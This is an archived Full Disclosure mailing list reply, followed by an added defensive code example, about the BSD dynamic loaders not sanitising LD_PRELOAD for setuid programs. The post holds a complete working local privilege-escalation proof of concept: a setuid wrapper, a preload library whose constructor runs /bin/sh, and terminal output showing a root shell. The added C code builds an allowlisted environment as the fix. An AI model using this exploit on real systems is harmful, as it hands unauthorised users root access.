Full Disclosure mailing list archives
Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
From: "Tyop?" <tyoptyop () gmail com>
Date: Wed, 22 Nov 2006 22:55:37 +0100
On 11/22/06, In Cognito <defend.the.world () gmail com> wrote:
> Impact: Serious. May lead to privilege escalation.
>
> A class of security vulnerabilities has resurfaced in the dynamic loaders of
> FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for
> suid and sgid binaries. Due to either badly implemented sanitization or a lack
> of it, a setuid binary may execute other processes with a tainted environment.
>
> [...]
>
> Have fun! Stay safe!
Fun. Not "perfectly" safe. My experience:

% id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
% cat vuln.c
#include <unistd.h>
int main(void) { setuid(0); execl("/usr/bin/id", "id", (char *)0); return 1; }
% cc vuln.c -o vuln && chmod 4711 ./vuln
% exit
id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
ls -l vuln
-rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
cat tyop.c
#include <stdio.h>
#include <unistd.h>
/* constructor: runs at load time via LD_PRELOAD, before the host program's main(); empty environment for the child */
__attribute__((constructor)) static void init(void) { printf("[+] Hello from shared library land\n"); execle("/bin/sh", "sh", (char *)0, (char *const *)0); }
cc -shared -o lib.so tyop.c
setenv LD_PRELOAD "/home/tyop/test/lib.so"
./vuln
[+] Hello from shared library land
# id
uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
# echo "It works on `uname -sr`"
It works on FreeBSD 7.0-CURRENT-200609
#

Have a nice day.

--
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
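Added example, not code from the post above or from any of the BSD projects: the application-side fix for the chain the message demonstrates. The wrapper in the post calls setuid(0) and then execl(), so the child is no longer a set-user-ID process from the loader's point of view and the loader honours the LD_PRELOAD the caller left in environ. Whatever the loader does, a setuid program that execs a helper should hand it an environment it built itself. The allowlist of variable names, the fixed PATH and the helper path /usr/bin/id below are assumptions chosen for illustration.

```c
/*
 * Added example (not the original post's code): build an explicit envp for
 * the child instead of inheriting environ. Names kept, the fixed PATH and
 * the helper path are assumptions for illustration.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Variable names allowed across the privilege boundary. Everything else,
 * in particular every LD_* variable the dynamic loader honours, is dropped.
 * PATH is never copied from the caller; a fixed one is supplied instead. */
static const char *const allowed_names[] = { "HOME", "TERM", "LANG", "USER", NULL };
static char safe_path[] = "PATH=/bin:/usr/bin";

/* Return 1 if "NAME=value" has NAME on the allowlist, 0 otherwise
 * (entries without '=' are malformed and dropped). */
int env_entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL)
        return 0;
    size_t len = (size_t)(eq - entry);
    for (size_t i = 0; allowed_names[i] != NULL; i++) {
        if (strlen(allowed_names[i]) == len &&
            strncmp(entry, allowed_names[i], len) == 0)
            return 1;
    }
    return 0;
}

/* Build a NULL-terminated envp for the child: safe_path first, then the
 * allowlisted entries of 'src' in their original order. The strings are
 * shared with 'src'; the caller frees only the returned array. 'count'
 * receives the number of entries, excluding the terminating NULL. */
char **sanitize_env(char *const *src, size_t *count)
{
    size_t n = 0;
    for (size_t i = 0; src != NULL && src[i] != NULL; i++)
        n++;

    char **dst = calloc(n + 2, sizeof *dst);   /* room for safe_path and NULL */
    if (dst == NULL)
        return NULL;

    size_t k = 0;
    dst[k++] = safe_path;
    for (size_t i = 0; i < n; i++)
        if (env_entry_allowed(src[i]))
            dst[k++] = src[i];
    dst[k] = NULL;
    if (count != NULL)
        *count = k;
    return dst;
}

int main(void)
{
    size_t n;
    char **clean = sanitize_env(environ, &n);
    if (clean == NULL) {
        perror("calloc");
        return 1;
    }
    /* The vulnerable wrapper did execl("/usr/bin/id", "id", 0), inheriting
     * environ with LD_PRELOAD in it. execve with the constructed envp is the
     * fix; the LD_PRELOAD from the caller never reaches the child. */
    char *const argv[] = { "id", NULL };
    execve("/usr/bin/id", argv, clean);
    perror("execve");
    free(clean);
    return 1;
}
```

An allowlist is used rather than stripping LD_* by name because the set of loader-controlled variables differs between platforms and releases (FreeBSD's rtld also reads LD_LIBMAP and friends); the child should see only what the wrapper has decided it needs. Dropping the privilege it does not need (setuid(getuid()) before exec, where the helper does not require root) is the complementary fix and is outside what this block shows.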